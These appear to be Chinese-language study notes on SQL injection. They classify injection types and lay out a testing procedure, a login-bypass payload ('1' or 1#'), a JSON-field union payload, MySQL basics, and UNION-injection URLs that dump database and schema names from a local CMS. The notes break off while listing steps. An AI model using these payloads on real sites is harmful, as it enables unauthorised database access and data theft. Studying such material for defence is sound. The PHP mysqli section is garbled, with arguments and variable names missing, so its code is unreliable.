1.SQL分类
基于变量数据类型分
数字型注入 字符型注入 '' ' ) ')
搜索型注入 %’
JSON型注入(判断是数字还是字符 考虑要不要闭合
JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"}
基于获取数据的方法
基于回显 基于错误 盲注 布尔型盲注 时间盲注
基于注入点位置分类(请求方法)
注入要判断是否有干扰
GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受)
HTTP头部(SERVER注入)
防护软件可能只针对某种提交方式进行防护 可以使用其他方式进行绕过
基于查询方式
2.SQL注入测试方法
1.寻找注入点(登录框,表单,http头部(cookie,ua,re),搜索或者查找。。)
2.判断注入点对符号有没有干扰
3.构造测试语句->1,判断注入类型(数字,字符)->2,闭合(--+ #)
4.通过order by判断列数
5.通过union select判断回显位置
6.构造语句,获取数据 database()
3.万能密码
1‘ or 1#
4.MYSQL基础知识
重要名称
information_schema 在php5.0以后支持的 information_schema.schemata 存放的是所有数据库名 information_schema.tables 存放的是所有表名 information_schema.columns 存放的是所有列名 table_schema 数据库名字 table_name 表名 column_name 列名 column_name 用来获取数据库的
SQL命令
1.查看当前数据库 show databases 2.创建数据库 create database wljy charset=gbk; 3.使用数据库 use wljy; 4.查看当前数据表 show tables; 5.创建数据表 default : 默认值 comment: 备注 表类型:int varchar(50) auto_increment自动增长 primary key create table test(id int primary key auto_increment,name varchar(50) not null,addr varchar(25) not null default '中国')engine=innodb charset=utf8; 6.查看表结构 desc(descripe) test show create table \G -- 将结果竖着排列 7.插入数据 insert into test(id,name,addr) values(1,'张三','福建'); insert into test values(null,'李四','东北'); insert into test(addr) values(''栋京'); // 报错 insert into test(name,addr) values('tom',default); 8.查看数据 select * from test where id=3; // 查id为3的所有信息 select name from test where id=3 // 查id为3的name信息 9.删除数据 delete from test where id=3; 10.删除表 drop table 表名 11.更新数据 update test set name='王五' where id=2;
1.使用mysqli函数,需要先开启对应的扩展
extension=php_mysqli.dll mysqli_connect(user,dbname); 2.设置字符编码 mysqli_set_charset(中文乱码写语句sql = "select * from 510_admin"; 5.执行sql语句,获取对象 con,获取对象数据rs] assoc 关联 row 索引 array 索引+关联
5.UNION注入
构造查询语句 1,暴库 cms http://127.0.0.1/cms/show.php?id=-32union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --+ 2,暴所有数据库 concat()用来连接字符,group_concat将查询的结果在一行内展示 table_schema:用于条件判断。例如判断该数据库是否是cms 若出现Illegal mix of collations for operation 'UNION',通过convert(schema_name using latin1)修改编码即可。 http://127.0.0.1/cms/show.php?id=-32union select 1,2,group_concat(convert(schema_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.schemata --+ 3,暴所有表名